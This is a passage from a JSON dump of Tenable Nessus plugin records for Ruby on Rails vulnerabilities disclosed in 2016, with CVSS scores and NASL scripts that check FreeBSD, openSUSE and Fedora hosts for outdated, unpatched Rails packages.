These contain important security fixes, and it is recommended that users upgrade as soon as possible.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-02-03T00:00:00", "type": "nessus", "title": "FreeBSD : rails -- multiple vulnerabilities (bb0ef21d-0e1b-461b-bc3d-9cba39948888)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7576", "CVE-2015-7577", "CVE-2015-7581", "CVE-2016-0751", "CVE-2016-0752", "CVE-2016-0753"], "modified": "2022-03-28T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:rubygem-actionpack", "p-cpe:/a:freebsd:freebsd:rubygem-actionpack4", "p-cpe:/a:freebsd:freebsd:rubygem-actionview", "p-cpe:/a:freebsd:freebsd:rubygem-activemodel4", "p-cpe:/a:freebsd:freebsd:rubygem-activerecord", "p-cpe:/a:freebsd:freebsd:rubygem-activerecord4", "p-cpe:/a:freebsd:freebsd:rubygem-rails", "p-cpe:/a:freebsd:freebsd:rubygem-rails-html-sanitizer", "p-cpe:/a:freebsd:freebsd:rubygem-rails4", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_BB0EF21D0E1B461BBC3D9CBA39948888.NASL", "href": "https://www.tenable.com/plugins/nessus/88532", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in 
this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88532);\n script_version(\"2.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/28\");\n\n script_cve_id(\n \"CVE-2015-7576\",\n \"CVE-2015-7577\",\n \"CVE-2015-7581\",\n \"CVE-2016-0751\",\n \"CVE-2016-0752\",\n \"CVE-2016-0753\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/15\");\n\n script_name(english:\"FreeBSD : rails -- multiple vulnerabilities (bb0ef21d-0e1b-461b-bc3d-9cba39948888)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"Ruby on Rails blog :\n\nRails 5.0.0.beta1.1, 4.2.5.1, 4.1.14.1, and 3.2.22.1 have been\nreleased! 
These contain important security fixes, and it is\nrecommended that users upgrade as soon as possible.\");\n # https://groups.google.com/forum/#!msg/rubyonrails-security/ANv0HDHEC3k/mt7wNGxbFQAJ\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?16d62ba2\");\n # https://groups.google.com/d/msg/rubyonrails-security/cawsWcQ6c8g/tegZtYdbFQAJ\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?42de9ca4\");\n # https://groups.google.com/forum/#!msg/rubyonrails-security/dthJ5wL69JE/YzPnFelbFQAJ\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2da12a39\");\n # https://groups.google.com/d/msg/rubyonrails-security/9oLY_FCzvoc/w9oI9XxbFQAJ\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2fcd6bd9\");\n # https://groups.google.com/d/msg/rubyonrails-security/335P1DcLG00/OfB9_LhbFQAJ\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5c9373e0\");\n # https://groups.google.com/d/msg/rubyonrails-security/6jQVC1geukQ/8oYETcxbFQAJ\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2dafa51e\");\n # https://weblog.rubyonrails.org/2016/1/25/Rails-5-0-0-beta1-1-4-2-5-1-4-1-14-1-3-2-22-1-and-rails-html-sanitizer-1-0-3-have-been-released/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6dab5e79\");\n # https://vuxml.freebsd.org/freebsd/bb0ef21d-0e1b-461b-bc3d-9cba39948888.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?820d8995\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", 
value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Ruby on Rails Dynamic Render File Upload Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/01/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/02/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:rubygem-actionpack\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:rubygem-actionpack4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:rubygem-actionview\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:rubygem-activemodel4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:rubygem-activerecord\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:rubygem-activerecord4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:rubygem-rails\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:rubygem-rails-html-sanitizer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:rubygem-rails4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"rubygem-actionpack<3.2.22.1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"rubygem-actionpack4<4.2.5.1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"rubygem-actionview<4.2.5.1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"rubygem-activemodel4<4.2.5.1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"rubygem-activerecord<3.2.22.1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"rubygem-activerecord4<4.2.5.1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"rubygem-rails<3.2.22.1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"rubygem-rails-html-sanitizer<1.0.3\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"rubygem-rails4<4.2.5.1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-01-11T16:32:52", "description": "This update for rubygem-actionpack-4_2, rubygem-actionview-4_2, rubygem-activemodel-4_2, rubygem-activerecord-4_2, rubygem-activesupport-4_2 fixes the following issues :\n\n - CVE-2015-7576: Timing attack vulnerability in basic authentication in Action Controller (boo#963329)\n\n - CVE-2016-0752: directory traversal and information leak in Action View (boo#963332)\n\n - CVE-2015-7581: unbounded memory growth DoS via wildcard controller routes 
(boo#963335)\n\n - CVE-2016-0751: rubygem-actionpack: Object Leak DoS (boo#963331)\n\n - CVE-2016-0753: Input Validation Circumvention (boo#963334)\n\n - CVE-2015-7577: Nested attributes rejection proc bypass (boo#963330)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-02-08T00:00:00", "type": "nessus", "title": "openSUSE Security Update : rubygem-actionpack-4_2 / rubygem-actionview-4_2 / rubygem-activemodel-4_2 / etc (openSUSE-2016-159)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7576", "CVE-2015-7577", "CVE-2015-7581", "CVE-2016-0751", "CVE-2016-0752", "CVE-2016-0753"], "modified": "2022-03-28T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:ruby2.1-rubygem-actionpack-4_2", "p-cpe:/a:novell:opensuse:ruby2.1-rubygem-actionpack-doc-4_2", "p-cpe:/a:novell:opensuse:ruby2.1-rubygem-actionview-4_2", "p-cpe:/a:novell:opensuse:ruby2.1-rubygem-actionview-doc-4_2", "p-cpe:/a:novell:opensuse:ruby2.1-rubygem-activemodel-4_2", "p-cpe:/a:novell:opensuse:ruby2.1-rubygem-activemodel-doc-4_2", "p-cpe:/a:novell:opensuse:ruby2.1-rubygem-activerecord-4_2", "p-cpe:/a:novell:opensuse:ruby2.1-rubygem-activerecord-doc-4_2", 
"p-cpe:/a:novell:opensuse:ruby2.1-rubygem-activesupport-4_2", "p-cpe:/a:novell:opensuse:ruby2.1-rubygem-activesupport-doc-4_2", "cpe:/o:novell:opensuse:42.1"], "id": "OPENSUSE-2016-159.NASL", "href": "https://www.tenable.com/plugins/nessus/88612", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-159.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88612);\n script_version(\"2.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/28\");\n\n script_cve_id(\n \"CVE-2015-7576\",\n \"CVE-2015-7577\",\n \"CVE-2015-7581\",\n \"CVE-2016-0751\",\n \"CVE-2016-0752\",\n \"CVE-2016-0753\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/15\");\n\n script_name(english:\"openSUSE Security Update : rubygem-actionpack-4_2 / rubygem-actionview-4_2 / rubygem-activemodel-4_2 / etc (openSUSE-2016-159)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for rubygem-actionpack-4_2, rubygem-actionview-4_2,\nrubygem-activemodel-4_2, rubygem-activerecord-4_2,\nrubygem-activesupport-4_2 fixes the following issues :\n\n - CVE-2015-7576: Timing attack vulnerability in basic\n authentication in Action Controller (boo#963329)\n\n - CVE-2016-0752: directory traversal and information leak\n in Action View (boo#963332)\n\n - CVE-2015-7581: unbounded memory growth DoS via wildcard\n controller routes (boo#963335)\n\n - CVE-2016-0751: rubygem-actionpack: Object Leak DoS\n (boo#963331)\n\n - CVE-2016-0753: Input Validation Circumvention\n (boo#963334)\n\n - CVE-2015-7577: Nested attributes rejection proc bypass\n (boo#963330)\");\n 
script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=963329\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=963330\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=963331\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=963332\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=963334\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=963335\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected rubygem-actionpack-4_2 / rubygem-actionview-4_2 / rubygem-activemodel-4_2 / etc packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Ruby on Rails Dynamic Render File Upload Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/02/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.1-rubygem-actionpack-4_2\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:ruby2.1-rubygem-actionpack-doc-4_2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.1-rubygem-actionview-4_2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.1-rubygem-actionview-doc-4_2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.1-rubygem-activemodel-4_2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.1-rubygem-activemodel-doc-4_2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.1-rubygem-activerecord-4_2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.1-rubygem-activerecord-doc-4_2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.1-rubygem-activesupport-4_2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.1-rubygem-activesupport-doc-4_2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.1\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ruby2.1-rubygem-actionpack-4_2-4.2.4-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ruby2.1-rubygem-actionpack-doc-4_2-4.2.4-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ruby2.1-rubygem-actionview-4_2-4.2.4-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ruby2.1-rubygem-actionview-doc-4_2-4.2.4-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ruby2.1-rubygem-activemodel-4_2-4.2.4-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ruby2.1-rubygem-activemodel-doc-4_2-4.2.4-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ruby2.1-rubygem-activerecord-4_2-4.2.4-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ruby2.1-rubygem-activerecord-doc-4_2-4.2.4-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ruby2.1-rubygem-activesupport-4_2-4.2.4-6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ruby2.1-rubygem-activesupport-doc-4_2-4.2.4-6.1\") ) flag++;\n\nif (flag)\n{\n if 
(report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ruby2.1-rubygem-actionpack-4_2 / ruby2.1-rubygem-actionpack-doc-4_2 / etc\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-03-01T14:22:02", "description": "Security fix for CVE-2015-7581 Security fix for CVE-2016-0751 Security fix for CVE-2015-7576\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-03-04T00:00:00", "type": "nessus", "title": "Fedora 23 : rubygem-actionpack-4.2.3-4.fc23 (2016-f486068393)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7576", "CVE-2015-7581", "CVE-2016-0751"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:rubygem-actionpack", 
"cpe:/o:fedoraproject:fedora:23"], "id": "FEDORA_2016-F486068393.NASL", "href": "https://www.tenable.com/plugins/nessus/89640", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2016-f486068393.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(89640);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-7576\", \"CVE-2015-7581\", \"CVE-2016-0751\");\n script_xref(name:\"FEDORA\", value:\"2016-f486068393\");\n\n script_name(english:\"Fedora 23 : rubygem-actionpack-4.2.3-4.fc23 (2016-f486068393)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2015-7581 Security fix for CVE-2016-0751 Security\nfix for CVE-2015-7576\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1301933\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1301946\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1301981\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2016-February/178067.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4d4f755e\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected rubygem-actionpack package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:rubygem-actionpack\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:23\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif 
(isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^23([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 23.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC23\", reference:\"rubygem-actionpack-4.2.3-4.fc23\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"rubygem-actionpack\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-11T16:30:43", "description": "Multiple security issues have been discovered in the Ruby on Rails web application development framework, which may result in denial of service, cross-site scripting, information disclosure or bypass of input validation.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-02-01T00:00:00", "type": "nessus", "title": "Debian DSA-3464-1 : rails - security update", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, 
